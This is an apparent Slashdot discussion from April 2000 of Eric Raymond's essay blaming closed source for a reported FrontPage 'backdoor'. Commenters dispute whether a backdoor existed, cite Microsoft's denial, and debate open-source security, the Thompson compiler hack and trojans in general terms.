Microsoft -- Designed for Insecurity

ESR ^[?] sent a feature about the Microsoft Web Server Backdoor - interesting stuff, and makes some good points about Open Source.

News services all over the world reported today (14 April 2000) that Microsoft programmers had inserted a security-compromising back door in their FrontPage web server software. Thousands of websites worldwide may be affected. Representative coverage of this story can be found at http://news.cnet.com/news/0-1003-200-1696137.html.

Amidst all the nervousness about yet another Windows security hole, and not a little amusement at the passphrase the Microsoft programmers chose to activate the back door ("Netscape engineers are weenies!") there is one major implication of this story that is going unreported.

This back door seems to have been present since at least 1996. That's four years -- *four years* -- that nobody but the pranksters who wrote it has known about that back door. Except, of course, for any of the unknown crackers and vandals who might have found it out years ago. All the world's crackers certainly know about it now after the worldwide media coverage.

Webmasters all over the world are going to be pulling all-nighters and tearing their hair out over this one. That is, webmasters who are unlucky enough to work for bosses who bought Microsoft. At the over 60% of sites running the open-source Apache webserver, webmasters will be kicking back and smiling -- because they know that Apache will *never* have a back door like this one.

Never may sound like a pretty strong claim. But it's true. Because back doors (unlike some other kinds of security bugs) tend to stand out like a sore thumb in source code. They're hard to conceal, easy to spot and disable -- *if you have access to the source code*.

It's the fact that the compromised Microsoft DLL was distributed in opaque binary form that made it possible for the good guys to miss this back door for four long years. In the Apache world, every every one of the tens of thousands of webmasters who uses it has access to the Apache source code. Many of them actually look at code difference reports when a new release comes out, as a routine precaution against bugs of all kinds.

Under all that scrutiny, a back door would be unlikely to escape detection for even four *days*. Anybody competent enough to try inserting a back door in Apache knows this in their bones. So it would be pointless to try, and won't be tried.

What's the wider lesson here?

It's pretty clear. Anybody who trusts their security to closed-source software is begging to have a back door slipped on to their system -- with or without the knowledge of the people who shipped the code and theoretically stand behind it. Microsoft HQ is doubtless sincere when it says this back door wasn't authorized. Not that that sincerity will be any help at all to the people who will have to clean up the mess. Nor will it compensate their bosses for what could be millions of dollars in expenses and business losses.

If you don't have any way to know what's in the bits of your software, you're at its mercy. You can't know its vulnerabilities. You can't know what *other people might know about it that you don't*. You're disarmed against your enemies.

Does this mean every single webmaster, every single software consumer, has to know the source code of the programs they use to feel secure? Of course not. But open source nevertheless changes the power equilibrium of security in ways that favor the defence -- it means back doors and bugs have a short, inglorious lifetime, because it means the guys in white hats can *see* them. And even if not every white hat is looking, potential black hats know that plenty of them will be. That changes and restricts the black hats' options.

Apache has never had an exploit like this, and never will. Nor will Linux, or the BIND library, or Perl, or any of the other open-source core software of the global Internet. Open-source software, subject to constant peer review, evolves and gets more secure over time. But as more crackers seek and find the better-hidden flaws in opaque binaries, closed-source software gets *less* secure over time.

Who knows what back doors may be lurking right now in other Windows software, only to be publicly acknowledged four years in the future? Who *can* know? And who in their right mind would be willing to risk their personal privacy or the operation of their business on the gamble that this is the *last* back door in Windows?

The truth is this: in an environment of escalating computer-security threats, closed source software is not just expensive and failure-prone -- it's *irresponsible*. Anyone relying on it is just asking, *begging* to be cracked. If theory didn't tell us that, the steadily rising rate of Windows cracks and exploits over the last eighteen months would.

Cockcroaches breed in the dark. Crackers thrive on code secrecy. It's time to let the sunlight in. --

http://www.tuxedo.org/~esr
Eric S. Raymond

"...quemadmodum gladius neminem occidit, occidentis telum est."
[...a sword never kills anybody; it's a tool in the killer's hand.]
-- (Lucius Annaeus) Seneca "the Younger" (ca. 4 BC-65 AD),

ESR

1. this is hardly news . This was all over the net yesterday, and already covered by slashdot
2. yet another rant by ESR..."open source is better than closed source. Ahah!! Nah nah nah nah nah." Open source software is just as root-able. Witness BIND, Apache, Sendmail (jesus, Sendmail is right, though I love it), RPC, et-cet-er-a.
3. The fact that this bug DIDN'T get exploited for four years is BECAUSE it's closed source software. Not good, not bad. Just the facts, Eric.
4. Of course, no one can prove that the bug hasn't been exploited for the past four years, but let's leave that for the conspiricy freaks and paranoids.

P.S. this -2 moderation crap (vis-a-vis ubertroll) is wrong. Stop it, Rob.

microsoft responds

http://www.microsoft.com/misc/data/servervulnerabi lity.htm

Microsoft Responds to Reports of Web Server Vulnerability -------------------------------------------------- ------------------------------ Microsoft has investigated the reports of a security flaw in its Web server software. There is no "trap door" or "back door" that would expose Web pages to users who were not authorized to see them. The rumors of a secret password that would allow access to Web page source code are false. However, a second independent vulnerability has been reported in the same Web server software that was the subject of the initial reports. Microsoft has prepared a revised security bulletin that documents the extent of this new vulnerability as well as a procedure for eliminating it. You should read the bulletin and follow the procedure that it describes if you are using Web servers based on: Microsoft Windows NT 4.0 Option Pack (the primary distribution mechanism for Internet Information Server 4.0) Personal Web Server 4.0 (ships as part of Windows 95 and Windows 98) FrontPage 98 Server Extensions Read the security bulletin at: http://www.microsoft.com/technet/security/bulletin /ms00-025.asp.

Re: Hello, there _is_no back door

To you, Linux is a religion. Anybody who disagrees with you is corrupt. You are a typical mindless zealot.

A lot of us happen to like some variety of opinion, and calling people who disagree with you "twats" is no more constructive than another "hot grits" post, and much less entertaining. Why don't you try making a serious arguement?

Re:slashdot motives?

YOU ARE PAID. SHUT UP.

How to backdoor an OSS project

Introduce exploitable flaws, what guarantuee do we even have that some of the buffer overflow exploits found in OSS projects were not intentional?

OpenBSD

[Pierce]

'nuff said.

Re:slashdot motives?

[HeUnique]

Nice of you to look at MS Web site - where in MS world everything is perfect, kosher and no hacks are known to men...

GET REAL!

Look at zdnn.com web site, C|Net and others and stop pointing at VA Linux. OK?

Re:Of course, KT's CC hack wasn't Open Source

[emerson]

The Thompson hack included the secondary hack that if the source to the compiler itself were recompiled, the backdoor-creating code would be silently re-inserted into the output copy of the compiler, as well as another copy of the secondary hack itself.

Meaning access to the source of the compiler wouldn't help -- all the source review you cared to do would not point out this 'compiler feature' if you had a compromised compiler in the first place.

Unless you're planning to start from first principles and code your compiler from hand in raw machine code to bootstrap yourself into being able to compile C source, you're going to HAVE to rely on someone else's potentially-compromised binaries at some point, if only to compile a new copy of your compiler.

Which gets back around to the bulk of your insightful point about who do you trust, but your original paragraph about the openness of the source is incorrect -- Thompson worked around that problem very neatly.


--

Re:Why is slashdot ignoring this important news?

[Alex+Belits]

Heh, well, I have no idea if that's true or not, but if it is, it's due to one simple fact: It helps to be correct.

Actually only to sound important -- most of what you post is neither correct nor relevant.

Re:Open Source's Glaring Security Problem

[Alex+Belits]

What if I "borrow" the executive's hard drive for a little while, and then use my custom version of Linux that doesn't repect Administrative Privileges to install my alternative file system, and then return the hard drive to its computer?

Only sysadmin can physically access computers that have any important information on them, so see above.

Re:The Famous Back door in OSS software.

[Alex+Belits]

It's well known trick, however it doesn't work unless a compiler can reliably recognize that it compiles a compiler, and can modify it without breaking -- at best compiler can recognize and modify its own source or something very similar, but since a lot of C compilers were made since that time, such backdoors can't survive.

Re:The Famous Back door in OSS software.

[Alex+Belits]

gcc can be built as crosscompiler on a platform that has a bunch of unrelated to gcc compilers, build itself (and libraries that it uses) for another platform and then used on another platform to build itself. Truly paranoid people can build it on many different platforms and compare the result of first self-built version -- if it's not identical, some versions are infected. The only case when it won't work is when all compilers involved are infected, and infection of all of them affects gcc in the same way -- something that I find hard to believe.

Is there really a venerability?

[khaladan]

Possibly, however the venerability was found after inspection triggered by comments relating to the "weenies" issue in the DVWSSR DLL file.

Those in the security scene know that there is no venerability related to the "weenies" string inside the DLL. However there may be a buffer overflow, see NtBugtraq.

Regardless, ESR's targeted audience for the past several articles seems to be the general public, not us. He's preaching to the choir and it's becoming annoying.

ESR: find something interesting to tell us.

Re:Is there really a venerability?

[tbarrie]

OK, OK, it's not really fair to harp on spelling errors ... Goodness knows, I'm at fault at least as often as anyone else. But... did anyone else find it hilarious that this poster confused the word "vulnerability" with "venerability". The latter, I assume, would mean "capable of being venerated", defined by MW Online (http://www.m-w.com/netdict.htm) as " to honor (as an icon or a relic) with a ritual act of devotion".

In the common parlance, "venerable" actually means "old", though as the root word suggests it's a very respectful way of saying "old".

And yes, with no disrespect intended to the original poster, it was one of the more amusing errors I've seen lately.

Re:Is there really a venerability?

[gilroy]

OK, OK, it's not really fair to harp on spelling errors ... Goodness knows, I'm at fault at least as often as anyone else.

But... did anyone else find it hilarious that this poster confused the word "vulnerability" with "venerability". The latter, I assume, would mean "capable of being venerated", defined by MW Online (http://www.m-w.com/netdict.htm) as " to honor (as an icon or a relic) with a ritual act of devotion".

Considering the quasi-religious fervor on both sides of the issue, this struck me as wonderfully a propos.

Re:The Linux community should not revert to FUD!

[Chris+Johnson]

The trouble is, the standard for honesty from Microsoft is _so_ low, and their manipulativeness _so_ high, that it almost forces one to become completely paranoid just to not be completely taken advantage of. These are the same people who faked video evidence in the antitrust case. When they say "There's no backdoor!" who, reasonably, can accept that on good faith without questioning it? When a third party (notably NT Bugtraq) says "There's no backdoor!", is it really unthinkable to consider if they were paid or coerced to say that? I know that's a hell of an accusation, but so is "Microsoft probably _faked_ that video evidence!", and of course that's ridiculous, they would never fake evidence in their own antitrust case- and yet, THEY DID THAT.

Is "Microsoft faked evidence!" still paranoid when it is true?

Is "They are lying, and the 'backdoor' was/is there on purpose in case Microsoft felt a need someday to use it" equally paranoid? In many ways it's a far more plausible claim than the faking of evidence- it's a power issue and easy for them to do and you could easily see them claiming that they _had_ to put in such backdoors in order to compete by being able to damage or alter the PCs used by competing firms, or perhaps tamper with government evidence stored on Windows PCs connected to the net, if that was necessary.

When a company begins to _live_ the reductio ad absurdum of a Randite wet dream, who can see it and recognize it for what it is? There are times when the normal expectations aren't describing what you're seeing. The only options are to refuse to see anything at all, or to try and make sense of the matter even when it seems crazy. Microsoft would never fabricate evidence for the courts of the United States, no, no! They _respect_ the law. It's paranoid to think that they would intentionally try to sabotage the justice system of this country that they are so proud of exemplifying! *enter David Boies, with a magnifying glass*

If you've got that kind of access...

[DCMonkey]

you could just rifle through their files at will anyways. Use physical security to keep modified kernel floppies at bay. Open Source is by far more useful for weeding out the user mode exploits that remain.

Re:I use Linux specifically because it's Open

[Stormie]

(okay, out with the anecdotes now, everyone over 35 will now come out with the time they saw a VMS machine crash)

Hey, I'm only 26 and I've seen a VMS machine crash. Once. In the 5 years I've been programming them. I think that's a pretty good recommendation. ;-)

Linux has crashed on me twice in the 3 years I've been using it. Comparatively lame. ;-)

NT.. well, the last crash was our mailserver a few hours ago <sigh>

Re:Complacency

[Frater+219]

This has already proven to be untrue in the case of Perl at least, as noted in this article in theRegister

Funny you should mention that, because the Register article says:

"Perl scripts are not the problem. Perl is not the problem. Incompetence is the problem. There are too many amateurs out there writing sloppy code. They get a brief lesson in Perl from some book and think that this makes them the Internet's gift to programming," [Bugtraq contributor Joe] Harris told The Register.

It's one thing to spread FUD, but to spread trivially refutable FUD, and link to the article that refutes it...? FWIW, ESR's point was that Perl itself (the interpreter, as distributed by Larry Wall and company) will never have deliberately-placed backdoors; not that it should be impossible to write insecure code in Perl.

Re:Open Source's Glaring Security Problem

[Frater+219]

You can't do that with closed-source software. Since you don't have the source code, you can't alter the code.

Actually, you can. That is exactly how application-infecting viruses work -- by modifying the (machine-language) code of installed binaries. They don't need the source; they use the fact that all executables of a given format have certain commonalities. A virus doesn't need access to Microsoft Word's source code in order to infect a copy of Word; it only needs to know that Word is an .EXE file, and that all .EXE files work the same way. Similarly, the writer of a Trojan horse can create a Trojaned executable from a clean one without recompiling.

Yes, it takes more work to figure out how to maliciously modify a binary than to do the same to source code -- but that figuring-out has already been done and documented, and so is already available for your friendly neighborhood saboteur.

Re:Yes ... there is.

[Amphigory]

I don't think "completely belies" is fair. In essence, it says "well, the backdoor that we spent 24 hours terrifying the world with isn't there. But we found another problem while we were looking for it". C'mon people... The misinformation running around has gone too far.

--

This actually is a cryptographic backdoor.

[Effugas]

Couple claims that this isn't a backdoor.

This appears to be true in the direct access control sense--knowing that Netscape Engineers were weenies didn't appear to *directly* provide arbitrary access to the server.

This isn't true cryptographically.

If I deploy my code to my good friends Alice and Bob, and Alice finds in her package something that lets her access *any* of Bob's data--be it a mangled string or whatnot--there's a backdoor in the cryptography. Instead of having to brute force the key, you just buy a separate but excessively equal copy of the target's host OS and rip the key out of that.

Remember: Cryptography is all about replacing big secrets with little secrets. If Bob's little secret gets shipped to Alice, whatever Bob was protecting with that little secret gets exposed.

If this really is just a string mangler, incidentally, it's not the first time we've seen this. Remember susageP?

Yours Truly,

Dan Kaminsky
DoxPara Research
http://www.doxpara.com

Re:This actually is a cryptographic backdoor.

[ecampbel]

No, you're wrong. "Netscape programmers are weenies!" is simply used to encrypt certain data travelling back and forth between two Microsoft components. Clearly, Microsoft did not intend for this security method to be foolproof; they simply wanted to keep the casual observer from seeing certain data. Here's what Russ cooper said:

While reports focused on a phrase -- "!seineew era sreenigne epacsteN" or the backwards spelling of "Netscape engineers are weenies!" -- which was present in the DLL, that's a red herring, said Cooper, adding that the phrase is not a password, but a cypher key used to scramble the address of Web pages requested by users..

Re:This actually is a cryptographic backdoor.

[MrBogus]

"This isn't true cryptographically."

It doesn't need to be true cryptographically -- it's an ACL issue, that's all. If you want to grant author rights to your website using clear HTTP authentication, there's nothing stopping you with IIS or Apache or anything else.

Re: Hello, there _is_no back door

[seppy]

Well I'll certainly agree that Eric Raymond is a hot air bag.

Are you on crack?

[kidlinux]

Yeah, MS has millions (riiight) of hackers/crackers attacking their software, finding and publishing bugs whenever they find them.

It took these "armies" 4 years to find this backdoor.

The fact is, there are less bugs in most OSS software to be found, therefore less will be reported in OSS software than in Microsoft's.

You also seem to ignore the fact that MS declares many bugs and miscillaneous problems as "features". They ignore many problems in their software, and those that they don't often take months before a patch is released.

This as opposed to OSS where you can find a patch within hours of the discovery of a bug, epxloit, or what have you.

Do you honestly think that Microsoft software has gotten better because of people "pounding away and screaming about weach[sic] exploit you find"? Look at Windows 2000; I seem to recall articles claiming there were at least 64000 known bugs in that software. You think this is an improvement?

And do you honestly believe Microsoft is building their software to "withstand the combined hatred of most of the h@kerz and script kiddiez out there"? Newsflash: THEY AREN'T. Has it not become obvious to you by now that M$ doesn't care about product integrity? If they did, we wouldn't be dealing with such issues as this, because these issues wouldn't exist. The fact is, these issues are in-our-face problems, problems, as it has been said, that can end up costing the industry millions of dollars to fix.

Apached is not just some software "that the Linux/Hacker community plays softball with". This is proven software, run by well over half the web sites in the world.

So... what system will I trust? Not that which is tested only from the outside, or binary side. I'll put my confidence in a system which can be, and is, scrutanized inside and out. Source code and binary.

Re:Are you on crack?

[lunatik17]

If you're going to rant about somebody not knowing what they're talking about, you'd best read the post carefully lest you come off sounding like an idiot like you just did. Kidlinux didn't say anywhere that there were a million bugs in Windows. In fact, he mentioned the 64,000 bug estimation Microsoft themselves have reported.

Here's my DeCSS mirror. Where's yours?

Re:Slasdot FUD

[jjohn]

ESR wrote Fetchmail.

Eric Allman wrote Sendmail.

Hope this helps.

Re:I use Linux specifically because it's Open

[Yakko]

PREFACE: I remember my intro into Linux back when win95 was in beta... WFW had gone tango-uniform for the nth time, or some other similarly aggrivating cruft... so I downloaded Slackware onto floppies and installed it. I've never looked back. So, I use Linux specifically because, well, I can!

ESR and the zelots who take up his arguments without careful consideration of the facts are rapidly making themselves a royal PITA. In case you haven't noticed, over one million copies of Windows 2000 have shipped since its introduction (real copies generating real revenue) and from my own experience, as well as that of others, it's pretty damn good. Good enough to make it easy to ignore Linux and all the stupid political baggage that it's acquired.

Frankly, it doesn't matter to me HOW many copies of win2k were "sold," or even "shipped." I quote both words because they're both very subjective, depending on the marketroid or cloobie you speak at. Units shipped/sold doesn't prove to me in the least that it's a better product.

As for political baggage, it can be argued that plenty of the proprietary kind of political baggage is installed in a typical windows install with no choice. "Sure, let's convert the company to IIS; it was free with the OS! ... or did they build it in this time?" It can also be debated that once you accept something (like windows, or even Linux) as a solution, all other alternatives cease to be evaluated. While with windows, there's no way to guarantee interoperability with everyone else, at least with Linux (or even a PROPRIETARY Unix), you have a good shot at keeping everyone happy, AND you can keep windows clients in places.

As for ESR not considering the facts... I tend to think he's a little more clued-in on the "political" aspect of this all... much moreso than I am.

--

Re:Why is slashdot ignoring this important news?

[fatboy]

There is no back door

Prove it.

Re:Open Source's Glaring Security Problem

[GypC]

To replace system binaries you'd have to be root... in which case you could read their email anyway.

I've seen you spread this FUD for years now, and you still don't get it. Please educate yourself on system security or shut up.

"Free your mind and your ass will follow"

Re:Open Source's Glaring Security Problem

[kronos]

Hi, John. I've replied to you about this, but you've never responded. Here's where your argument breaks down: "For example, suppose I want to snoop on doings in the executive suite. I just modify the file system to write copies into another directory--or send copies of all the CEO's email to my home server. When I have the data I want, I just replace the original versions of the OS--and no one will be the wiser. "

How do i "just" replace the filesystem? Sure, I could recompile a new one, but how do I get the system to use it? I'd have to have Administrative Privileges (that's "root" in the unix/linux world) -- and in that case I could do all of those things without having to go to all the trouble of writing a trojan. So -- the only condition open-source trojans are viable is when *the author doesn't need them.*

Please, John, if you have any issues with this, feel free to reply to this comment. I'd be more than happy to elaborate on the concept of a multi-user security model for you, since you seem to be assuming that Linux uses a security model like Win9x.

Kronos.

Re:Excelent and balanced article

[Sam+Ruby]

All too often, I see ESR and others merely summarize information that is already out there, and take easy shots at Microsoft. I have said so in the past.

This article appeared genuinely different to me, and is the type of article I would like to encourage. Based on the other replies - somehow that makes me bad. Whatever.

Even is the information that the article was based on turns out to be incorrect, this is quite different than accusing ESR of "trying to propagate a lie". By making such statements, this makes me wonder about your motives; reducing your credibility; exactly the point I was originally trying to make.

Excelent and balanced article

[Sam+Ruby]

Brings up a new and important point (four years is a long time to go unnoticed) that didn't get much press coverage previously, and refrains from taking gratuitious shots at Microsoft that would detract from the message.

Expecially good is the "Microsoft HQ is doubtless sincere when it says this back door wasn't authorized". In this case, giving MS the benefit of the doubt actually makes the case for open source *stronger*.

Re:Excelent and balanced article

[Zico]

Sorry, Sam, but this article was very poor. You claim that ESR is giving Microsoft the benefit of the doubt. How could you possibly believe this when he is trying to propagate a lie of there being a back door to begin with? Authorized or unauthorized, it doesn't exist.

Cheers,
ZicoKnows@hotmail.com

Re:Excelent and balanced article

[MadAhab]

Sorry, Zico, but your rampant MS apologism does stick out like a sore thumb to those of us who've encountered unpaid minions (and sticking out as an apologist of anything on /. is hard).

The revelation that the backdoor was "just" an unrelated buffer overflow is

1. no consolation to the folks who now have to repair their servers
2. discovered mere hours before the Raymond article, which is conclusive proof he knew about it only to the criminally insane
3. not very relevant, since it doesn't change the substance of his argument
4. no reassurance to the public, who are now realizing that MS will leave their customers out in the cold when their misdeeds do real damage to their CUSTOMERS
5. not very relevant, when you are weighing the reports of security experts that 99.999% of the public have never heard of against the ADMISSION of wrongdoing by a multi-billion dollar corporation as reported in 10 of 10 major news sources

How many free copies of W2K are you getting for your efforts? Or is it just the thrill of being an obnoxious asshole that keeps you going? Try it with actual logic and common sense when you get bored of wanking.

Re:The Linux community should not revert to FUD!

[GoRK]

It doesn't matter whether or not there is/was/was ever a backdoor. No matter if it's entirely true or not, the public is set on the idea that "!seineew era sreenigne epacsteN" is a huge security problem. At least it's more tangable than buffer overflows (which the public at large tend to care nothing about - look at AOLIM).

At the very least, the idea is that the string shouldn't be in there no matter what it does (and yet we seem to care nothing about easter eggs) so why not go ahead and use it to push an advantage of open source? It's a foothold in Microsoft's own game! M$ does this sort of thing all the time (look at Mindcraft).

While I do agree that ESR should probably have clarified that this particular time the security implications of "!seineew era sreenigne epacsteN" are minimal, I do not think that it's ever a bad time to point out the advantages of OSS, especially when the public is more prone to accept and agree with it!

~GoRK

Re:Of course, KT's CC hack wasn't Open Source

[DavidTC]

Ah, but even if the other compiler had back doors, it wouldn't matter, unless it had the same code code where it inserted the bug...otherwise, it wouldn't trigger on compiling the compiler, and you'd end up with a clean one.

-David T. C.

Re:The economics of backdoors

[Syberghost]

(This is almost certainly way low, in that I'm assuming 25% of approximately 12,000 servers on the Internet. I have no real idea how many servers there are.)

I'd say you're off by a couple of orders of magnitude, right there.

Netcraft surveys nearly 10 million sites, and they have to be missing a lot.

Re:The economics of backdoors

[Syberghost]

Scratch that; it's over 13 million now.

Re:Yes ... there is.

[Duckie01]

Actually, it's a rare day indeed when an actual Linux exploit makes news at Slashdot.

That's because in the open source world, the fix would be there long before they have a chance of posting the story :)

Re:Source Code no Panacea

[Graymalkin]

Would you recognize the inserted back door if you weren't damn familiar with GCC and C for that matter? I could write the backdoor in assembler and have GCC's code insert it into the app, then you'd have to be damn fluent in assembler to figure out what was going on. You're never as clever as you think you are.

Re:Why is slashdot ignoring this important news?

[Zico]

It sure as Hell is a lot more relevant to readers of this site than a completely fabricated story from ESR. For anyone who still hasn't bothered to keep up with yesterday's news, listen up: There is no back door.

Which is it, Hemos? Is Slashdot more interested in discussing the truth openly, or does VA Linux prefer that you trumpet lies?

Cheers,
ZicoKnows@hotmail.com

Re:Yes ... there is.

[Zico]

Actually, it's a rare day indeed when an actual Linux exploit makes news at Slashdot. Usually the farthest they go toward that end is bringing up hypothetical problems. I don't have a problem with that standard of reporting -- I subscribe to Bugtraq and NTbugtraq for that kind of information, I'm not looking for it at Slashdot -- although the inconsistency of their Microsoft reporting on the same topic is a bit annoying.

Now, this second thing needs to be cleared up: I am not ripping Slashdot for reporting the original story -- everyone else was reporting it, so I'd be surprised if Slashdot didn't. I'm ripping them for publishing this essay, propatating the lie that there's some evil back door involved. It was known yesterday afternoon that there was no back door, and in fact, Slashdot even posted an update to that story (albeit incorrect in other, innocent ways) which stated this. For them to now drag out ESR's essay, built upon a lie which Slashdot itself had already discounted, is inexcusable.

Cheers,
ZicoKnows@hotmail.com

Re:Why is slashdot ignoring this important news?

[Zico]

Actually only to sound important -- most of what you post is neither correct nor relevant.

Give it a try sometime, if you can muster it, Alex. It's so much more becoming than the bitter and humorless nerd image that you project. :)

Cheers,
ZicoKnows@hotmail.com

Hello, there _is_ no back door

[Zico]

Not only that, but this has been known since yesterday. Was ESR too busy thinking up pithy one-liners for his article to bother checking out the facts?

Oh well, wouldn't want to let that stop ESR from shooting his mouth off. Since when was he ever concerned about the truth anyway?

Cheers,
ZicoKnows@hotmail.com

Re:Hello, there _is_ no back door

[SEWilco]

Okay, this says it's only a bug, not a backdoor. Oh, no, not a bug in MS code. What a shocker.

Re:Hello, there _is_ no back door

[Wah]

Regardless of the exact nature of the code, the simple fact is that something like this has been allowed to exist for so long. And how many of these types of "features" need to be strung together before you DO have a backdoor. Of course this is just one person putting a backdoor in web server software that protects billions of dollars. It has now been done, it will be done again. This is PROOF OF CONCEPT, and that's enough for me (not like I didn't already dislike M$, but this is good fuel for the fire)

Four Years!

--

Re:Hello, there _is_ no back door

[dbrutus]

Anyway, Red Hat's CEO's expressed aim was to collapse to OS market! "shrink it to a few million a year" as far as I recall...

If that is true then he is unlikely to succeed because beyond the technology of making a stable, fast, efficient OS there is the entire question of the User Interface/Experience. Here is where Linux is falling down on the job so far.

I'm looking forward to see how Apple is going to make out with MacOS X. If it takes off, you have a business model that keeps the OS market alive as a commercial model for the masses and kicks Linux right in it's vulnerable UI guts.

(BTW: eat your heart out, I'm still up 14% on my AAPL)

DB

Re:Hello, there _is_ no back door

[lunatik17]

I'm looking forward to see how Apple is going to make out with MacOS X. If it takes off, you have a business model that keeps the OS market alive as a commercial model for the masses and kicks Linux right in it's vulnerable UI guts.

After years of loathing Apple for their rediculously oversimplified OS, I am actually finding myself looking forward to OS X myself. Switching to an open-source UNIX backend is, in my opinion, the smartest thing they could've done. However, I am quite sure it won't do a damn thing to Linux in marketshare--these two OS's are at complete opposite ends of the OS spectrum. Linux is a server OS. Front-end UI improvements are nice for those of us hardcore geeks who demand server performance and utility on a desktop machine (I'm guilty :), but that makes no difference to the market where Linux really shines in--the server market. Putting it down because of a bad UI is comparing Apples to Oranges... er, Apples to Penguins... whatever :)

Here's my DeCSS mirror. Where's yours?

Re:Hello, there _is_ no back door

[Maxintern9]

...Initial reports of a "back door" in Microsoft Corp.'s FrontPage server software -- a deliberate security hole put in to allow illicit access -- now seem to be, for the most part, incorrect.

Also, from the same ZDnet article:
"It breaks the absolute wall between Web sites on a shared server," said Steve Lipner, manager of Microsoft's security response center. "But you can't see anything that you're not authorized to by the access controllers."

Article:here

Re: Hello, there _is_no back door

[Zico]

Sure. This links to my post of information (http://slashdot.org/comments.pl?sid=00/04/14/0619 206&cid=494) from Russ at NTbugtraq which explains their findings that a back door wasn't involved. It turns out that there was/is a vulnerability that this post didn't catch, but the back door was clearly counted out. This was posted sometime before 4pm EDT yesterday, so ESR definitely had time to find this out.

Secondly, here's an updated link (http://slashdot.org/comments.pl?sid=00/04/14/0619 206&cid=540) which describes what the vulnerability is all about. (It also contains two more links for further, more detailed information.

Cheers,
ZicoKnows@hotmail.com

Re:Yes ... there is.

[Zico]

"Completely belies"? That's certainly misleading. The fact is that there is a vulnerability in that DLL, both in its security (although, if a webmaster had the proper permissions on his files, he would be immune to this), and that there's a potential buffer overrun situation in the code.

Now...

If Slashdot would like to start posting essays on every Linux buffer overrun that comes down the pike, and -- most importantly -- get everyone worked up in a frenzy by not describing them as the bugs that they are, but instead as EVIL BACKDOORS (!) so that the authors could hack your server anytime they felt like it, then I'm all for it. Somehow I don't think that Andover.net and VA Linux would be too interested in this new policy. Until that policy is instituted, I can only assume that Erik Raymond's -- and Slashdot's by posting this -- priority lies in generating untrue, positive PR for the benefit of VA Linux's stock price, and not the quest for truth and objective debate.

Cheers,
ZicoKnows@hotmail.com

Re:Why is slashdot ignoring this important news?

[Zico]

does anyone have any doubt that Zico is easily Slashdot's most frequently moderated up troll, period

Heh, well, I have no idea if that's true or not, but if it is, it's due to one simple fact: It helps to be correct.

All the Anonymous Cowards love to howl and moan about my posts, but all their wind falls on deaf ears because they aren't bright enough to refute anything I'm saying. Yep, everything I say must be lies and PR, but amazingly, none of them are ever able to point out where I'm incorrect -- they just make themselves look like immature little ranters. Do they actually think that they're helping to support those points of view which run counter to mine? Yeah, right.

I've noticed that almost invariably, the people who can actually make some good arguments with me are the ones who bother to put their names behind it. And if you ever notice, I'm not miserly with the respect for any replier who posts with respect themselves when they disagree with me. So anyway, that's my theory.

And to all the ACs with brains out there putting up the good fight, the above isn't referring to you, so keep up the good work!

Cheers,
ZicoKnows@hotmail.com

Re:Yes ... there is.

[zCyl]

Oh come now, Slashdot posted the same kinds of stories long before VA Linux came into the picture. What is the source of this VA Linux paranoia? Has anyone ever seen or heard of them doing anything detrimental to Slashdot?

Re:CamPAIN for Free Speech

[zCyl]

A lot of posts are moderated quite highly that contradict Open Source ideas. For the most part, moderators are rational sensible people, which makes sense considering that they're selected from among average contributing slashdotters.

The reason more posts contrary to open source ideas get moderated down is because a large number of them are written as unintelligent and meaningless flamebait posts. In statistics this is called a "correlation", and as the mantra of statistics goes, "correlation does not imply causation". If you don't get that, look it up.

Re:Yes, it has been done!

[dosowski]

Oh, I agree completely. It just bothered me that he claimed that nobody would even try to put a backdoor into open-source software, when it has been done. It can be dangerous to think that way.

Yes, it has been done!

[dosowski]

ESR needs to do a little remembering. There has already been at least one case of a backdoor being put in open-source Linux software. Anyone remember this? There were logged downloads of the infected file before the backdoor was discovered, but I don't know if anybody got as far as installing the bad login program.

It just shows that you can't believe that because there's somebody out there looking at the source that you'll always be safe. It's all too easy to download, compile, and install something without security concerns because you think that nobody will attempt to put backdoors in the software, or that even if they do try, somebody will catch it before you become a victim.

Re:Yes, it has been done!

[Cheshire+Cat]

But because your example was open-sourced, the login.c backdoor was caught. Had it been close-sourced, I doubt it would've ever been caught. So again, open source is more secure then closed-source, as ESR observed.

Re:Good Points? No, Same Points

[Pacorro]

This is not flamebait, I think it is a valid comment. Im tired of looking at people trying to kiss ESR or RMS butt everywhere they show up.

True not a magic solution but a very good one

[Felinoid]

Open source is not a magic solution by any means.
With closed source a person slips a backdoor into the code it is unlikely to be spotted at all.
By the time it is spotted (even if hours after the release) there is a very small chance the person who accually inserted the code will ever be identifyed.
If he is he will be quitely handled or worse it may just be ignored. He may not even be an employee anymore and instead inserting new backdoors into products from a diffrent company.

With open source you know who is responsable for the code. If he dose let back doors slip into his code he has done a poor job in the first place. If he slips the code intentionally even worse.

One of the elements that make open source work is the gate keepers.. the code mainatinners. We do have to trust them a tad.
What keeps the code from becomming progressivly worse instead of progressivly better is someone is looking at the code making sure the new code is good.

Part of that job is to look for back doors and potental security defects.
Failling that he faces the public... A slashdot post.. and a flood of hate mail.
Oh and did I mention.. he'll be very unpopulare.

It's not a magical solution to backdoors however... Open source back doors can not be installed by "just anyone" it must pass inspection by the code maintainer. Obscure code sould NEVER pass inspection even if it looks innocent it is not maintainable and therefor should not go in the code.
If the maintainer inserted the code we know who to blame. If he simply let code slip we know who to blame for that. If he starts writing incryptic phrases into the code like "Dance with the chicken slut" we'll know about that as well.

This turns out to be a false alarm... just a minnor defect.. not a major back door.

Re:on and off topic- Regarding the above posts.

[Felinoid]

On any given forum a person expressing an opinion that is unpopulare on that forum is likely to not use tact and instead act in outrage.
Most people who know better than to insult also know they are better off not expressing the opinion where it is not populare to start with.

Quite a few posters on Slashdot DO NOT know how to post an unpopulare opinion and I have seen far to many "Bill Gates made the Internet" and "Linux SUX" type nonsense passing itself off as valid comments.

Be aware that whatever you say will be read and understood by a real thinking breathing human being. You can not simply punch information in and expect people to swallow...
So many posts critical of open source forget that we are accually familure with the subject and are pritty insulting...

Easter Egg syndrom

[MeanGene]

As many people have pointed out this "backdoor" is not quite as severe as some earlier exploits in sendmail and smail. ;-)

It's a poor Easter Egg - just like the X97:L97 flight simulator.

Open source development lets the programmers achieve personal recognition that is not hidden behind the corporate "brand name". Now, personal recognition is the real reason why open source doesn't have compromising Easter Eggs - everybody's name is mentioned!

Re:I use Linux specifically because it's Open

[shambler+snack]

Be it for backdoors, security or updates, nothing beats OSS.

In this instance (and many others) I beg to differ. I have had no less than two security emails from Microsoft Product Security in the last 48 hours when this "exploit" first broke. I received the first April 14th, and the second today. Both gave explicit instructions for removing the vulnerability:

Remediation
===========
To eliminate this vulnerability, customers who are hosting web sites
